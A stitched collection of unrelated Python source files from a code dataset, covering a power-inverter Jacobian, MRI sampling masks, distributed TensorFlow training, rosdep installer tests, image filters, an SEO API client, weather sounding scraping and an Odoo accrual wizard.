J[varInd['iaR'],varInd['iaR']] = -self.Rf/self.Lf
J[varInd['iaR'],varInd['iaI']] = (self.xPLL+self.Kp_PLL*self.vd+2*math.pi*60)/self.wbase
J[varInd['iaR'],varInd['xaR']] = self.Vdc/(2*self.Lf)
J[varInd['iaR'],varInd['uaR']] = (self.Vdc*self.Kp_GCC)/(2*self.Lf)
J[varInd['iaR'],varInd['xPLL']] = self.ia.imag/self.wbase
J[varInd['iaR'],varInd['wte']] = ((self.Kp_PLL*self.ia.imag*ra)/self.wbase)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
J[varInd['iaI'],varInd['iaR']]= -(self.xPLL+self.Kp_PLL*self.vd+2*math.pi*60)/self.wbase
J[varInd['iaI'],varInd['iaI']]= -self.Rf/self.Lf
J[varInd['iaI'],varInd['xaI']]= self.Vdc/(2*self.Lf)
J[varInd['iaI'],varInd['uaI']]= (self.Vdc*self.Kp_GCC)/(2*self.Lf)
J[varInd['iaI'],varInd['xPLL']]= -self.ia.real/self.wbase
J[varInd['iaI'],varInd['wte']] = ((self.Kp_PLL*self.ia.real*ra)/self.wbase)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
#Current controller dynamics
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign(self.Ki_GCC*self.ua.real) == np.sign(self.xa.real):
J[varInd['xaR'],varInd['uaR']]=0.0
else:
J[varInd['xaR'],varInd['uaR']]=self.Ki_GCC
if np.sign(self.Ki_GCC*self.ua.imag) == np.sign(self.xa.imag):
J[varInd['xaI'],varInd['uaI']]=0.0
else:
J[varInd['xaI'],varInd['uaI']]=self.Ki_GCC
else:
J[varInd['xaR'],varInd['uaR']]=self.Ki_GCC
J[varInd['xaI'],varInd['uaI']]=self.Ki_GCC
if abs(self.Kp_GCC*self.ua + self.xa)>self.m_limit:
if np.sign( (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)) == np.sign(self.ua.real):
J[varInd['uaR'],varInd['iaR']]= 0.0
J[varInd['uaR'],varInd['uaR']]= 0.0
J[varInd['uaR'],varInd['xP']]= 0.0
else:
#duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
J[varInd['uaR'],varInd['iaR']]= -self.wp
J[varInd['uaR'],varInd['uaR']]= -self.wp
J[varInd['uaR'],varInd['xP']]= self.wp
if np.sign((self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)) == np.sign(self.ua.imag):
#duaI = 0.0
J[varInd['uaI'],varInd['iaR']]= 0.0
J[varInd['uaI'],varInd['iaI']]= 0.0
J[varInd['uaI'],varInd['uaI']]= 0.0
J[varInd['uaI'],varInd['xQ']]= 0.0
else:
#duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
J[varInd['uaI'],varInd['iaR']]= (self.Kp_Q*self.wp*self.va.imag/2)
J[varInd['uaI'],varInd['iaI']]= -self.wp - (self.Kp_Q*self.wp*self.va.real/2)
J[varInd['uaI'],varInd['uaI']]= -self.wp
J[varInd['uaI'],varInd['xQ']]= self.wp
else:
#duaR = (self.wp)*(-self.ua.real +self.ia_ref.real - self.ia.real)
#duaI = (self.wp)*(-self.ua.imag +self.ia_ref.imag - self.ia.imag)
J[varInd['uaR'],varInd['iaR']]= -self.wp
J[varInd['uaR'],varInd['uaR']]= -self.wp
#J[varInd['uaR'],varInd['Vdc']]= -self.wp*self.Kp_DC
J[varInd['uaR'],varInd['xP']]= self.wp
J[varInd['uaI'],varInd['iaR']]= (self.Kp_Q*self.wp*self.va.imag/2)
J[varInd['uaI'],varInd['iaI']]= -self.wp - (self.Kp_Q*self.wp*self.va.real/2)
J[varInd['uaI'],varInd['uaI']]= -self.wp
J[varInd['uaI'],varInd['xQ']]= self.wp
#Active power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(self.Ki_P*(self.Vdc_ref - self.Vdc)) == np.sign(self.xP):
#dxP = 0.0
J[varInd['xP'],varInd['iaR']]= 0.0
J[varInd['xP'],varInd['iaI']]= 0.0
else:
#dxP = self.Ki_P*(self.Ppv -self.S.real)
J[varInd['xP'],varInd['iaR']]= (self.Ki_P*self.va.imag/2)
J[varInd['xP'],varInd['iaI']]= -(self.Ki_P*self.va.real/2)
else:
#dxP = self.Ki_P*(self.Ppv -self.S.real)
J[varInd['xP'],varInd['iaR']]= (self.Ki_P*self.va.imag/2)
J[varInd['xP'],varInd['iaI']]= -(self.Ki_P*self.va.real/2)
# Reactive power controller dynamics
if abs(self.xP + self.Kp_P*(self.Ppv -self.S.real) + 1j*(self.xQ- self.Kp_Q*(self.Q_ref - self.S_PCC.imag)))>self.iref_limit:
if np.sign(-self.Ki_Q*(self.Q_ref - self.S_PCC.imag)) == np.sign(self.xQ):
#dxQ = 0.0
J[varInd['xQ'],varInd['iaR']]= 0.0
J[varInd['xQ'],varInd['iaI']]= 0.0
else:
#dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
J[varInd['xQ'],varInd['iaR']]= (self.Ki_Q*self.va.imag/2)
J[varInd['xQ'],varInd['iaI']]= -(self.Ki_Q*self.va.real/2)
else:
#dxQ = -self.Ki_Q*(self.Q_ref - self.S_PCC.imag)
J[varInd['xQ'],varInd['iaR']]= (self.Ki_Q*self.va.imag/2)
J[varInd['xQ'],varInd['iaI']]= -(self.Ki_Q*self.va.real/2)
#SRF-PLL dynamics
#dxPLL = self.Ki_PLL*(self.vd)
J[varInd['xPLL'],varInd['wte']] = (self.Ki_PLL*ra)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
#Frequency integration to get angle
#dwte = self.we
J[varInd['wte'],varInd['xPLL']]= 1
J[varInd['wte'],varInd['wte']] = (self.Kp_PLL*ra)*(-math.cos(theta_a)*math.sin(self.wte)
+ math.cos(theta_a-math.pi/2)*math.cos(self.wte))
return J
except:
LogUtil.exception_handler()
| StarcoderdataPython |
6511546 | <filename>subtle_data_crimes/crime_2_jpeg/Fig7/DL/utils/sampling_funcs.py
import numpy as np
import sigpy as sp
import math
from subtle_data_crimes.functions import new_poisson
import matplotlib.pyplot as plt
# ===================== 2D Variable-density Sampling (based on <NAME>'s Sparse MRI toolbox) ============================
def create_samp_mask(R, imSize, calib=[24, 24], mask_show_flag=0):
print('gen PDF & sampling mask...')
# Here we define the variable "poly_degree", which controls the shape of the PDF.
# Strong variable density can be obtained with poly_degree =~5
# Weak variable density can be obtained with poly_degree = 50
# Extremeley weak variable density, which is almost (but not exactly) uniform random, is obtained with poly_dgree = 1000
if R == 10:
poly_degree = 4.5
elif R == 8:
poly_degree = 4
elif R == 6:
poly_degree = 3
elif R == 5:
poly_degree = 2.5
elif R == 4:
poly_degree = 2
elif R == 3:
poly_degree = 1.5
elif R == 2:
poly_degree = 1.5
elif R > 10:
poly_degree = 10 # works OK for R=6,8,10 without calib, but results are unstable
pdf = genPDF(imSize, poly_degree, 1 / R)
mask = genSampling(pdf, iter=10, tol=60, calib=calib)
# mask = np.expand_dims(mask,axis=0) # add coils dim to mask
if mask_show_flag == 1:
# display sampling mask
fig = plt.figure()
plt.imshow(mask, cmap="gray")
plt.axis('off')
plt.title('R={}'.format(R))
plt.show()
fname = 'mask_R{}'.format(R)
fig.savefig(fname=fname)
elif mask_show_flag == 2: # display mask & pdf
# display sampling mask & PDF
fig = plt.figure()
plt.imshow(np.concatenate((mask, pdf), axis=1), cmap="gray")
plt.axis('off')
plt.title('sampling mask & pdf \n R={}'.format(R))
plt.show()
fname = 'mask_and_PDF_R{}'.format(R)
fig.savefig(fname=fname)
return mask, pdf
############### genPDF ###########################
def genPDF(imSize, p, pctg, distType=2, radius=0, disp=0):
# This function generates a pdf for a 1d or 2d random sampling pattern
# with polynomial variable density sampling
# Input:
# imSize - size of matrix or vector
# p - power of polynomial
# pctg - partial sampling factor e.g. 0.5 for half
# distType - 1 or 2 for L1 or L2 distance measure
# radius - radius of fully sampled center
# disp - display output
# Output:
# pdf - the pdf
# val - min sampling density
# (c) <NAME> 2007. Converted from Matlab to Python by <NAME> (2020)
minval = 0
maxval = 1
val = 0.5
if len(imSize) == 2: # 2D case
# sx = imSize(1);
# sy = imSize(2);
# PCTG = floor(pctg*sx*sy);
sx = imSize[0]
sy = imSize[1]
PCTG = np.floor(pctg * sx * sy)
x_co = np.linspace(-1, 1, sy) # coordinates
y_co = np.linspace(-1, 1, sx) # coordinates
x, y = np.meshgrid(x_co, y_co)
if distType == 1:
r = np.max(np.abs(x), np.abs(y))
else:
r = np.sqrt(x ** 2 + y ** 2)
r = r / np.max(np.abs(r.reshape(1, -1)))
elif len(imSize) == 1: # 1D case
sx = imSize[0]
r = np.abs(np.linspace(-1, 1, sx))
# create PDF
idx = np.where(r < radius)
pdf = (1 - r) ** p + val
pdf[pdf > 1] = 1
pdf[idx] = 1
while (1):
val = minval / 2 + maxval / 2
pdf = (1 - r) ** p + val
pdf[pdf > 1] = 1
pdf[idx] = 1
N = np.floor(np.sum(pdf))
if N > PCTG: # infeasible
maxval = val
if N < PCTG: # feasible, but not optimal
minval = val
if N == PCTG: # optimal
break
return pdf
############### genSampling ###########################
def genSampling(pdf, iter, tol, calib=[1, 1]):
# A monte-carlo algorithm to generate a sampling pattern with
# minimum peak interference. The number of samples will be
# sum(pdf) +- tol
#
# Inputs:
# pdf - probability density function to choose samples from
# iter - vector of min interferences measured each try
# tol - the deviation from the desired number of samples in samples
# Outputs:
# mask - sampling pattern
# (c) <NAME> 2007.
# Converted from Matlab to Python by <NAME> (2020)
# print('inside genSampling')
print('calib=', calib)
pdf[pdf > 1] = 1
K = np.sum(pdf[::])
minIntr = np.array([1e99])
minIntrVec = np.zeros(pdf.shape)
for n in range(iter):
tmp = np.zeros(pdf.shape)
while np.abs(np.sum(tmp[::]) - K) > tol:
tmp = np.random.random(pdf.shape) < pdf
TMP = np.fft.ifft2(tmp / pdf)
if np.max(np.abs(TMP[1:-1])) < minIntr:
minIntr = np.max(np.abs(TMP[1:-1]))
minIntrVec = tmp
mask = minIntrVec
# add calibration area
nx = mask.shape[-1]
ny = mask.shape[-2]
mask[int(ny / 2 - calib[-2] / 2):int(ny / 2 + calib[-2] / 2),
int(nx / 2 - calib[-1] / 2):int(nx / 2 + calib[-1] / 2)] = 1
return mask
# ############### Example for calling the above two functions: ###########################
# imSize=np.array([128,128])
# #imSize=np.array([128])
# R_wanted = 6
# pctg = 1/R_wanted
# p=3
# pdf,_ = genPDF(imSize,p,pctg)
# mask = genSampling(pdf,iter=10,tol=60)
# fig = plt.figure()
# plt.imshow(abs(pdf))
# fig = plt.figure()
# plt.imshow(mask)
| StarcoderdataPython |
9690377 | """Synchronous SGD
Author: <NAME>
"""
from __future__ import print_function
import tensorflow as tf
import argparse
import time
import os
FLAGS = None
log_dir = '/logdir'
REPLICAS_TO_AGGREGATE = 2
def main():
# Configure
config=tf.ConfigProto(log_device_placement=False)
# Server Setup
cluster = tf.train.ClusterSpec({
'ps':['localhost:2222'],
'worker':['localhost:2223','localhost:2224']
}) #allows this node know about all other nodes
if FLAGS.job_name == 'ps': #checks if parameter server
server = tf.train.Server(cluster,
job_name="ps",
task_index=FLAGS.task_index,
config=config)
server.join()
else: #it must be a worker server
is_chief = (FLAGS.task_index == 0) #checks if this is the chief node
server = tf.train.Server(cluster,
job_name="worker",
task_index=FLAGS.task_index,
config=config)
# Graph
worker_device = "/job:%s/task:%d/cpu:0" % (FLAGS.job_name,FLAGS.task_index)
with tf.device(tf.train.replica_device_setter(ps_tasks=1,
worker_device=worker_device)):
a = tf.Variable(tf.constant(0.,shape=[2]),dtype=tf.float32)
b = tf.Variable(tf.constant(0.,shape=[2]),dtype=tf.float32)
c=a+b
global_step = tf.Variable(0,dtype=tf.int32,trainable=False,name='global_step')
target = tf.constant(100.,shape=[2],dtype=tf.float32)
loss = tf.reduce_mean(tf.square(c-target))
# create an optimizer then wrap it with SynceReplicasOptimizer
optimizer = tf.train.GradientDescentOptimizer(.0001)
optimizer1 = tf.train.SyncReplicasOptimizer(optimizer,
replicas_to_aggregate=REPLICAS_TO_AGGREGATE, total_num_replicas=2)
opt = optimizer1.minimize(loss,global_step=global_step) # averages gradients
#opt = optimizer1.minimize(REPLICAS_TO_AGGREGATE*loss,
# global_step=global_step) # hackily sums gradients
# Session
sync_replicas_hook = optimizer1.make_session_run_hook(is_chief)
stop_hook = tf.train.StopAtStepHook(last_step=10)
hooks = [sync_replicas_hook,stop_hook]
# Monitored Training Session
sess = tf.train.MonitoredTrainingSession(master = server.target,
is_chief=is_chief,
config=config,
hooks=hooks,
stop_grace_period_secs=10)
print('Starting training on worker %d'%FLAGS.task_index)
while not sess.should_stop():
_,r,gs=sess.run([opt,c,global_step])
print(r,'step: ',gs,'worker: ',FLAGS.task_index)
if is_chief: time.sleep(1)
time.sleep(1)
print('Done',FLAGS.task_index)
time.sleep(10) #grace period to wait before closing session
sess.close()
print('Session from worker %d closed cleanly'%FLAGS.task_index)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Flags for defining the tf.train.ClusterSpec
parser.add_argument(
"--job_name",
type=str,
default="",
help="One of 'ps', 'worker'"
)
# Flags for defining the tf.train.Server
parser.add_argument(
"--task_index",
type=int,
default=0,
help="Index of task within the job"
)
FLAGS, unparsed = parser.parse_known_args()
print(FLAGS.task_index)
main()
| StarcoderdataPython |
193181 | # Copyright (c) 2011, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Author <NAME>/<EMAIL>
import os
import traceback
try:
from unittest.mock import patch, Mock
except ImportError:
from mock import patch, Mock
def get_test_dir():
# not used yet
return os.path.abspath(os.path.join(os.path.dirname(__file__), 'redhat'))
def test_rpm_expand_cmd():
from rosdep2.platforms.redhat import rpm_expand_cmd
m = Mock()
m.return_value = ''
# Non-macro test, should return the string unmodified
val = rpm_expand_cmd('test-string', exec_fn=m)
assert val == 'test-string', val
# Macro test, should return expanded rpm tag
with open(os.path.join(get_test_dir(), 'rpm-E-fedora'), 'r') as f:
m.return_value = f.read()
val = rpm_expand_cmd('%fedora', exec_fn=m)
assert val == '27', val
def test_rpm_detect():
from rosdep2.platforms.redhat import rpm_detect
m = Mock()
m.return_value = ''
val = rpm_detect([], exec_fn=m)
assert val == [], val
# Negitive case test. rpms use devel, rather than dev
with open(os.path.join(get_test_dir(), 'rpm-q-tinyxml-dev'), 'r') as f:
m.return_value = f.read()
val = rpm_detect(['tinyxml-dev'], exec_fn=m)
assert val == [], val
# Positive case test. rpm should always be installed if you're attempting to detect rpms
with open(os.path.join(get_test_dir(), 'rpm-q-rpm'), 'r') as f:
m.return_value = f.read()
val = rpm_detect(['rpm'], exec_fn=m)
assert val == ['rpm'], val
def test_DnfInstaller():
from rosdep2.platforms.redhat import DnfInstaller
@patch.object(DnfInstaller, 'get_packages_to_install')
def test(expected_prefix, mock_method):
installer = DnfInstaller()
mock_method.return_value = []
assert [] == installer.get_install_command(['fake'])
# no interactive option with YUM
mock_method.return_value = ['a', 'b']
expected = [expected_prefix + ['dnf', '--assumeyes', '--quiet', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--quiet', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--assumeyes', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=False)
assert val == expected, val + expected
expected = [expected_prefix + ['dnf', '--setopt=strict=0', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=False)
assert val == expected, val + expected
try:
with patch('rosdep2.installers.os.geteuid', return_value=1):
test(['sudo', '-H'])
with patch('rosdep2.installers.os.geteuid', return_value=0):
test([])
except AssertionError:
traceback.print_exc()
raise
def test_YumInstaller():
from rosdep2.platforms.redhat import YumInstaller
@patch.object(YumInstaller, 'get_packages_to_install')
def test(expected_prefix, mock_method):
installer = YumInstaller()
mock_method.return_value = []
assert [] == installer.get_install_command(['fake'])
# no interactive option with YUM
mock_method.return_value = ['a', 'b']
expected = [expected_prefix + ['yum', '--assumeyes', '--quiet', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--quiet', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=True)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--assumeyes', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=False, quiet=False)
assert val == expected, val + expected
expected = [expected_prefix + ['yum', '--skip-broken', 'install', 'a', 'b']]
val = installer.get_install_command(['whatever'], interactive=True, quiet=False)
assert val == expected, val + expected
try:
with patch('rosdep2.installers.os.geteuid', return_value=1):
test(['sudo', '-H'])
with patch('rosdep2.installers.os.geteuid', return_value=0):
test([])
except AssertionError:
traceback.print_exc()
raise
def test_Fedora_variable_installer_key():
from rosdep2 import InstallerContext
from rosdep2.platforms import pip, redhat, source
from rosdep2.platforms.redhat import DNF_INSTALLER, YUM_INSTALLER
from rospkg.os_detect import OsDetect, OS_FEDORA
os_detect_mock = Mock(spec=OsDetect)
os_detect_mock.get_name.return_value = 'fedora'
os_detect_mock.get_codename.return_value = 'twenty'
os_detect_mock.get_version.return_value = '21'
# create our test fixture. use most of the default toolchain, but
# replace the apt installer with one that we can have more fun
# with. we will do all tests with ubuntu lucid keys -- other
# tests should cover different resolution cases.
context = InstallerContext(os_detect_mock)
pip.register_installers(context)
redhat.register_installers(context)
source.register_installers(context)
redhat.register_platforms(context)
assert YUM_INSTALLER == context.get_default_os_installer_key(OS_FEDORA)
os_detect_mock.get_version.return_value = '22'
assert DNF_INSTALLER == context.get_default_os_installer_key(OS_FEDORA)
def test_Fedora_variable_lookup_key():
from rosdep2 import InstallerContext
from rosdep2.platforms import pip, redhat, source
from rosdep2.platforms.redhat import DNF_INSTALLER, YUM_INSTALLER
from rospkg.os_detect import OsDetect, OS_FEDORA
os_detect_mock = Mock(spec=OsDetect)
os_detect_mock.get_name.return_value = 'fedora'
os_detect_mock.get_codename.return_value = 'heisenbug'
os_detect_mock.get_version.return_value = '20'
# create our test fixture. use most of the default toolchain, but
# replace the apt installer with one that we can have more fun
# with. we will do all tests with ubuntu lucid keys -- other
# tests should cover different resolution cases.
context = InstallerContext(os_detect_mock)
pip.register_installers(context)
redhat.register_installers(context)
source.register_installers(context)
redhat.register_platforms(context)
assert ('fedora', 'heisenbug') == context.get_os_name_and_version()
os_detect_mock.get_codename.return_value = 'twenty'
os_detect_mock.get_version.return_value = '21'
assert (OS_FEDORA, '21') == context.get_os_name_and_version()
| StarcoderdataPython |
8164147 | from Cimpl import *
file = choose_file()
image = load_image(file)
def two_tone(image: Image, color1: str, color2: str) -> Image:
""" Author: <NAME>
Return an image with only two tones with specified colours from the user.
>>> image = load_image(choose_file())
>>> two_tone_image = two_tone(image, "yellow", "green")
>>> show(two_tone_image)
"""
for pixel in image:
x, y, (r, g, b) = pixel
avg_color = (r+g+b)/3
#DEFINES the colors and the number values associated (1st value in colors corresponds to the 1st color tuple of the color_values)
colors = ["black", "white", "red", "lime", "blue", "yellow", "cyan", "magenta", "gray"]
color_values = [(0,0,0), (255,255,255),(255,0,0),(0,255,0), (0,0,255), (255,255,0), (0,255,255), (255,0,255),(128,128,128)]
#Uses the color inputted by the user and determines the number values
for i in range(len(colors)):
if color1 == colors[i]:
c1 = color_values[i]
for i in range(len(colors)):
if color2 == colors[i]:
c2 = color_values[i]
if avg_color >= 0 and avg_color <= 127:
result = create_color(c1[0],c1[1],c1[2])
set_color(image, x, y, result)
elif avg_color >= 128 and avg_color <=255:
result = create_color(c2[0],c2[1],c2[2])
set_color(image, x, y, result)
show(image)
return image
copy_image = two_tone(image, "red", "cyan")
#copy_image2 = three_tone(image, "black", "cyan", "white")
| StarcoderdataPython |
3381391 | '''Write a program to find whether a given number is a power of 2 or not.
Output Format:
Print 'YES' or 'NO' accordingly
Example:
Input:
64
Output:
YES
Input:
48
Output:
NO
Explanation:
In the first example, 64 is a power of 2 so the answer is YES.
The second number is not a power of 2 hence the answer is NO.'''
#The Code
import math #math module for mathematical functions
n=int(input("Enter the number"))
def log2(n): #find log2 of the given number
l=math.log10(n)/math.log10(2)
return(l)
def isPower(n): #checking if a number is power of two
return (math.ceil(log2(n)) == math.floor(log2(n))) #comparisson of floor and ceil values
if(isPower(n)): #printing output
print("YES", end="")
else:
print("NO", end="") | StarcoderdataPython |
3498855 | class A:
x = 3
a = A()
a.x += 1
| StarcoderdataPython |
75050 | <gh_stars>0
from pathlib import Path
from typing import Optional, Union
from dataforseo_sdk.config import Config
from .rest_client import RestClient
class APIClient:
"""APIClient is a wrapper for the original RestClient
class provided by Data for SEO.
"""
def __init__(
self,
credentials: object,
api_version: str = "v3",
data_dir: Optional[Path] = Config.config["data_dir"],
) -> None:
"""Constructor for APIClient
Args:
credentials (object): a credentials object with username/password attributes
api_version (str, optional): the version of the Data for SEO API. Options are "v2" or "v3". Defaults to "v3".
data_dir (_type_, optional): the directory to which all responses as json files are written to and read from. Defaults to Config.config["data_dir"].
"""
self.credentials = credentials
self.api_version = api_version
self.data_dir = data_dir
self._client = None
@property
def client(self) -> RestClient:
"""A property for the http client.
Returns:
RestClient: The class that makes the http requests to the API.
"""
if not self._client:
self._client = RestClient(
self.credentials.username,
self.credentials.password,
requests_log_dir=self.data_dir,
)
return self._client
c = client
def get(self, endpoint: str) -> dict:
"""The method that makes GET HTTP requests.
Args:
endpoint (str): The URL without the api version to make the HTTP request against
Returns:
dict: A dictionary representing the json response
"""
return self.client.get(f"/{self.api_version}/{endpoint}")
def post(self, endpoint: str, data: Union[list, dict, str]) -> dict:
"""The method that makes POST HTTP requests.
Args:
endpoint (str): The URL without the api version to make the HTTP request against
data (Union[list, dict, str]): The object to pass as post data in the request
Returns:
dict: A dictionary representing the json response
"""
return self.client.post(f"/{self.api_version}/{endpoint}", data)
| StarcoderdataPython |
349942 | from kao_decorators import proxy_for
@proxy_for('_items', ['__iter__', '__contains__', '__getitem__', 'append', 'extend'])
class ListArg:
""" Represents a list of args taht hsould be returned as a comma separated list """
def __init__(self, items=None):
""" Initialize with the items """
self._items = items if items is not None else []
def build(self):
""" Return the argument """
return ",".join(self._items) | StarcoderdataPython |
179129 | import numpy as np
import pandas as pd
from datetime import datetime, timedelta
import calendar
import re
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
def get_uwyo_sounding(year, month, FROM, TO, stnm, save_csv = False ):
url = f'http://weather.uwyo.edu/cgi-bin/sounding?region=europe&TYPE=TEXT%3ALIST&YEAR={year}&MONTH={month:02d}&FROM={FROM:04d}&TO={TO:04d}&STNM={stnm}'
#only the STNM is usefull not the region
uwyo = requests.get(url)
uwyo_soup = BeautifulSoup(uwyo.text, 'html.parser')
data = uwyo_soup.find_all('pre') # list of each sounding between FROM and TO
title = uwyo_soup.find_all('h2') # the title of each sounding in the form "...Observations at %HZ %d %b %Y"
data_sounding = data[::2] # excludes Station information and sounding indices keeps only the table of mesurments
info_sounding = data[1::2] # keeps only Station information and sounding indices
columns_name=['PRES(hPa)', 'HGHT(m)', 'TEMP(C)', 'DWPT(C)', 'RELH(%)', 'MIXR(g/kg)', 'DRCT(deg)', 'SKNT(knot)', 'THTA(K)', 'THTE(K)', 'THTV(K)']
result = pd.DataFrame()
for i, table in enumerate(data_sounding):
table = str(table).split('\n')[5:-1] # list of lines of the table without the header and HTML tags
table = [[float(i) if i else np.nan for i in re.split("\s{1,6}", j)[1:]]for j in table] # list(each line of the table) of list(each column) with values as float
# It appends that there are no mesurments for the first lines, if it is the case then the first lines don't have the right len
table = [line[:11] for line in table]
date = re.findall("[0-9]*Z [0-9][0-9] \w* [0-9]{4}",str(title[i]))[0] # the date from the tile format = '%HZ %d %b %Y'
date = datetime.strptime(date, '%HZ %d %b %Y')
df = pd.DataFrame(table, columns = columns_name)
df['DATE']=date # convert the list to pandas DataFrame to wich a column date is added
result = pd.concat([result, df])
result.set_index(['DATE','HGHT(m)'], inplace = True) #DataFrame with multi index level1 date and level2 alt(m)
if save_csv:
result.to_csv(f'{stnm}_{year}{month:02d}_{FROM:04d}_{TO:04d}.csv')
return result
def get_soundings_by_dates(stnm, start,stop, save_csv = False):
'''region in {'samer': 'South America', 'europe': 'Europe', 'naconf': 'North America', 'pac': 'South Pacific',
'nz': 'New Zealand','ant': 'Antartica', 'np': 'Artic', 'africa': 'Africa', 'seasia': 'South-East Asia',
'mideast': 'Middle East'}
stnm : station number
start, stop : 'YYYYMMDDHH'
'''
start, stop = [datetime.strptime(_, '%Y%m%d%H') for _ in [start,stop]] # start, stop as datetime
total_months = lambda dt: dt.month + 12 * dt.year
tot_m = total_months(stop)-total_months(start)+1 # number of months to itterate on
result = pd.DataFrame()
start_tmp = start
for i in tqdm(range(tot_m)):
FROM = start_tmp
_, day_max=calendar.monthrange(start_tmp.year, start_tmp.month)
TO = datetime(start_tmp.year, start_tmp.month, day_max, 12)
if TO>=stop:
TO = stop
start_tmp = TO + timedelta(days=1) # change start value for next month
df = get_uwyo_sounding(FROM.year, FROM.month, int(f'{FROM.day}{FROM.hour:02d}'), int(f'{TO.day}{TO.hour:02d}'), stnm, save_csv = False )
result = pd.concat([result,df])
if save_csv:
result.to_csv(f'{stnm}__{start}_{stop}.csv')
return result
| StarcoderdataPython |
46952 | # -*- coding: utf-8 -*-
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools.misc import format_date
class AccrualAccountingWizard(models.TransientModel):
_name = 'account.accrual.accounting.wizard'
_description = 'Create accrual entry.'
date = fields.Date(required=True)
company_id = fields.Many2one('res.company', required=True)
account_type = fields.Selection([('income', 'Revenue'), ('expense', 'Expense')])
active_move_line_ids = fields.Many2many('account.move.line')
journal_id = fields.Many2one('account.journal', required=True, readonly=False,
domain="[('company_id', '=', company_id), ('type', '=', 'general')]",
related="company_id.accrual_default_journal_id")
expense_accrual_account = fields.Many2one('account.account', readonly=False,
domain="[('company_id', '=', company_id), ('internal_type', 'not in', ('receivable', 'payable')), ('internal_group', '=', 'liability'), ('reconcile', '=', True)]",
related="company_id.expense_accrual_account_id")
revenue_accrual_account = fields.Many2one('account.account', readonly=False,
domain="[('company_id', '=', company_id), ('internal_type', 'not in', ('receivable', 'payable')), ('internal_group', '=', 'asset'), ('reconcile', '=', True)]",
related="company_id.revenue_accrual_account_id")
percentage = fields.Float("Percentage", default=100.0)
total_amount = fields.Monetary(compute="_compute_total_amount", currency_field='company_currency_id')
company_currency_id = fields.Many2one('res.currency', related='company_id.currency_id')
@api.constrains('percentage')
def _constraint_percentage(self):
for record in self:
if not (0.0 < record.percentage <= 100.0):
raise UserError(_("Percentage must be between 0 and 100"))
@api.depends('percentage', 'active_move_line_ids')
def _compute_total_amount(self):
for record in self:
record.total_amount = sum(record.active_move_line_ids.mapped(lambda l: record.percentage * (l.debit + l.credit) / 100))
@api.model
def default_get(self, fields):
if self.env.context.get('active_model') != 'account.move.line' or not self.env.context.get('active_ids'):
raise UserError(_('This can only be used on journal items'))
rec = super(AccrualAccountingWizard, self).default_get(fields)
active_move_line_ids = self.env['account.move.line'].browse(self.env.context['active_ids'])
rec['active_move_line_ids'] = active_move_line_ids.ids
if any(move.state != 'posted' for move in active_move_line_ids.mapped('move_id')):
raise UserError(_('You can only change the period for posted journal items.'))
if any(move_line.reconciled for move_line in active_move_line_ids):
raise UserError(_('You can only change the period for items that are not yet reconciled.'))
if any(line.account_id.user_type_id != active_move_line_ids[0].account_id.user_type_id for line in active_move_line_ids):
raise UserError(_('All accounts on the lines must be from the same type.'))
if any(line.company_id != active_move_line_ids[0].company_id for line in active_move_line_ids):
raise UserError(_('All lines must be from the same company.'))
rec['company_id'] = active_move_line_ids[0].company_id.id
